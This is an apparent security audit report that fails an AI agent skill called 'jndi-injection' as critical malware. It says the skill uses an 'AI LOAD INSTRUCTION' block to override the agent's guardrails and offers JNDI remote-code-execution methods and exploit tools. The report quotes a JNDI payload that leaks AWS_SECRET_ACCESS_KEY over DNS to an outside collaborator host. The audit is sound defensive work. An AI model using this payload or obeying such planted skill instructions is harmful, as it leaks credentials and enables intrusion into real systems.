jndi-injection

Fail

Audited by Gen Agent Trust Hub on Jul 21, 2026

Risk Level: CRITICALDATA_EXFILTRATIONCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [PROMPT_INJECTION]: The skill uses an "AI LOAD INSTRUCTION" block to establish a specific persona ("Expert JNDI injection techniques") and direct the agent's behavior, potentially overriding safety guardrails concerning the distinction between JNDI and general deserialization attacks.\n- [DATA_EXFILTRATION]: Section 5 provides specific payloads for exfiltrating sensitive environment variables via DNS lookups, such as ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.TOKEN.collab.net}, which facilitates the leakage of credentials to an external listener.\n- [COMMAND_EXECUTION]: Sections 3, 4, and 8 provide specific command-line instructions for running known exploitation tools, including ysoserial, marshalsec, JNDI-Injection-Exploit.jar, and RogueJndi.jar.\n- [REMOTE_CODE_EXECUTION]: The entire skill is dedicated to achieving remote code execution. It provides detailed methodologies for abusing JNDI lookups (RMI, LDAP) to load and execute remote classes or trigger deserialization gadget chains on the target system.
Recommendations
  • CRITICAL: 1 file(s) identified as malware by FileRep - DO NOT USE
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Jul 21, 2026, 01:23 PM
Security Audit — agent-trust-hub — jndi-injection